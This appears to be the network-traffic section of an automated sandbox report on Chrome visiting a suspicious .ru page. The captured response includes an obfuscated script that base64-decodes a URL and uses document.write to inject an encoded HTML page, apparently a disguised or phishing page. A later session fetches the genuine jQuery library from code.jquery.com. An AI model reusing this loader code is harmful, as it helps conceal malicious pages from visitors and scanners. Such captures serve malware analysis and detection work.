                                0192.168.2.649700172.67.194.2164434920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-03-24 23:59:40 UTC673OUTGET /krVkG/ HTTP/1.1
                                Host: knig.rocaterma.ru
                                Connection: keep-alive
                                Upgrade-Insecure-Requests: 1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: navigate
                                Sec-Fetch-User: ?1
                                Sec-Fetch-Dest: document
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                sec-ch-ua-mobile: ?0
                                sec-ch-ua-platform: "Windows"
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-03-24 23:59:41 UTC1210INHTTP/1.1 200 OK
                                Date: Mon, 24 Mar 2025 23:59:41 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: no-cache, private
                                cf-cache-status: DYNAMIC
                                vary: accept-encoding
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fvj1ha0B8QcZqEoIlSUTLcsLfQ%2BLpL9wHlj9TQDorcQqx6L5bjkz32WSprX1UEDAWWyhj38AvSWFYgTT7yDc1EXIZTqw0TqdRUvptuJbtcxbDx7fPMzvuq1Egp02NLP1rvew"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                server-timing: cfL4;desc="?proto=TCP&rtt=10413&min_rtt=10328&rtt_var=3934&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1576&delivery_rate=275755&cwnd=249&unsent_bytes=0&cid=dc25ebc496f3f5ef&ts=288&x=0"
                                Set-Cookie: XSRF-TOKEN=eyJpdiI6IjFzSmg2UGNrNGViZlF1ZmtKNDNTUHc9PSIsInZhbHVlIjoiL2d5dVNCWjhGTyszVUxSa25vZVd2TnZHVFU1VFg4SUl4ekNtV2VJbTBrdXNQMmYxWXc0dzZUMVZVanNpYytuNVRvZ29ZZFpnNmVVekJZVlAyc1p5c3JlRlV4RTB2NzIrSWJjTWhKR0ZYbG9JcUpPU0g1c0xhWk1rbGRtaVA4eTEiLCJtYWMiOiJjZmQzMTUxOWZmZmU1Y2FhOTVkZWVmZTZhZDQ0MWJkN2U4MTJkOWFmNjZjNjhjMjBhZTMyNmEwOTNmNjIxMmYzIiwidGFnIjoiIn0%3D; expires=Tue, 25-Mar-2025 01:59:41 GMT; Max-Age=7200; path=/; secure; samesite=none
                                2025-03-24 23:59:41 UTC764INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 75 53 6a 42 30 4d 7a 68 79 52 55 6b 72 55 57 4a 53 61 56 6b 76 55 32 39 32 56 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 4e 6b 39 4b 53 45 63 78 4e 46 64 46 57 6d 39 6c 64 48 56 71 57 58 56 70 65 6e 52 78 54 48 64 69 4d 48 68 58 4c 32 77 34 61 58 6c 70 61 48 6c 56 51 55 31 51 51 32 31 79 56 58 6b 77 52 32 39 32 55 30 52 4c 4d 30 70 6a 53 55 6c 32 64 55 68 59 4d 54 4e 57 55 6c 46 36 59 55 74 53 5a 32 68 34 62 57 4e 57 5a 47 70 4d 65 55 6c 6e 65 6d 4a 47 52 44 4d 78 64 45 68 46 4d 47 64 5a 57 45 49 35 4e 55 4e 61 55 54 42 35 61 57 4e 4c 63 57 39 36 61 57 39 49 4e 44 55 72 64 31 56 32 64 54 42 34 4f 48 42 70 57 45 52 57 56 6e 59
                                Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlJuSjB0MzhyRUkrUWJSaVkvU292VFE9PSIsInZhbHVlIjoiNk9KSEcxNFdFWm9ldHVqWXVpenRxTHdiMHhXL2w4aXlpaHlVQU1QQ21yVXkwR292U0RLM0pjSUl2dUhYMTNWUlF6YUtSZ2h4bWNWZGpMeUlnemJGRDMxdEhFMGdZWEI5NUNaUTB5aWNLcW96aW9INDUrd1V2dTB4OHBpWERWVnY
                                2025-03-24 23:59:41 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 73 63 72 69 70 74 3e 0a 59 46 4b 77 48 66 5a 47 55 63 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 72 54 6d 6c 48 4c 6e 4a 76 59 32 46 30 5a 58 4a 74 59 53 35 79 64 53 39 72 63 6c 5a 72 52 79 38 3d 22 29 3b 0a 72 63 52 41 79 78 66 6c 43 64 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 55 4f 71 43 55 67 55 59 75 42 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 59 46 4b 77 48 66 5a 47 55 63 20 3d 3d 20 72 63 52 41 79 78 66 6c 43 64 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 55 4f 71 43 55 67 55 59 75 42 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f
                                Data Ascii: 7ffa<script>YFKwHfZGUc = atob("aHR0cHM6Ly9rTmlHLnJvY2F0ZXJtYS5ydS9rclZrRy8=");rcRAyxflCd = atob("bm9tYXRjaA==");UOqCUgUYuB = atob("d3JpdGU=");if(YFKwHfZGUc == rcRAyxflCd){document[UOqCUgUYuB](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+Cjxo
                                2025-03-24 23:59:41 UTC1369INData Raw: 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f
                                Data Ascii: OFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oOOFpOOFpO++oO++oO++o
                                2025-03-24 23:59:41 UTC1369INData Raw: 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f
                                Data Ascii: FpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpO++oO
                                2025-03-24 23:59:41 UTC1369INData Raw: 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f
                                Data Ascii: pO++oO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oOOFpO++oO++oO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpOOFpO++oO++oO++oO++oO++oO++oOO
                                2025-03-24 23:59:41 UTC1369INData Raw: 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b
                                Data Ascii: OOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++
                                2025-03-24 23:59:41 UTC1369INData Raw: 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f
                                Data Ascii: OFpO++oOOFpOOFpOOFpOOFpO++oO++oOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oO++oO++oO++o
                                2025-03-24 23:59:41 UTC1369INData Raw: 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f
                                Data Ascii: FpO++oO++oO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpO++oOOFpO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oOOFpO
                                2025-03-24 23:59:41 UTC1369INData Raw: 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b
                                Data Ascii: pOOFpOOFpO++oOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpO++oO++oO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO+
                                2025-03-24 23:59:41 UTC1369INData Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46
                                Data Ascii: OOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oO++oOOFpO++oO++oO++oO++oO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOF


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.649708151.101.130.1374434920C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-03-24 23:59:42 UTC664OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                Host: code.jquery.com
                                Connection: keep-alive
                                sec-ch-ua-platform: "Windows"
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                sec-ch-ua-mobile: ?0
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Sec-Fetch-Storage-Access: active
                                Referer: https://knig.rocaterma.ru/
                                Accept-Encoding: gzip, deflate, br, zstd
                                Accept-Language: en-US,en;q=0.9
                                2025-03-24 23:59:42 UTC565INHTTP/1.1 200 OK
                                Connection: close
                                Content-Length: 89501
                                Server: nginx
                                Content-Type: application/javascript; charset=utf-8
                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                ETag: "28feccc0-15d9d"
                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                Access-Control-Allow-Origin: *
                                Cross-Origin-Resource-Policy: cross-origin
                                Accept-Ranges: bytes
                                Date: Mon, 24 Mar 2025 23:59:42 GMT
                                Via: 1.1 varnish
                                Age: 1529765
                                X-Served-By: cache-lga21992-LGA
                                X-Cache: HIT
                                X-Cache-Hits: 1759
                                X-Timer: S1742860782.478204,VS0,VE0
                                Vary: Accept-Encoding
                                2025-03-24 23:59:42 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                2025-03-24 23:59:42 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                2025-03-24 23:59:42 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                2025-03-24 23:59:42 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
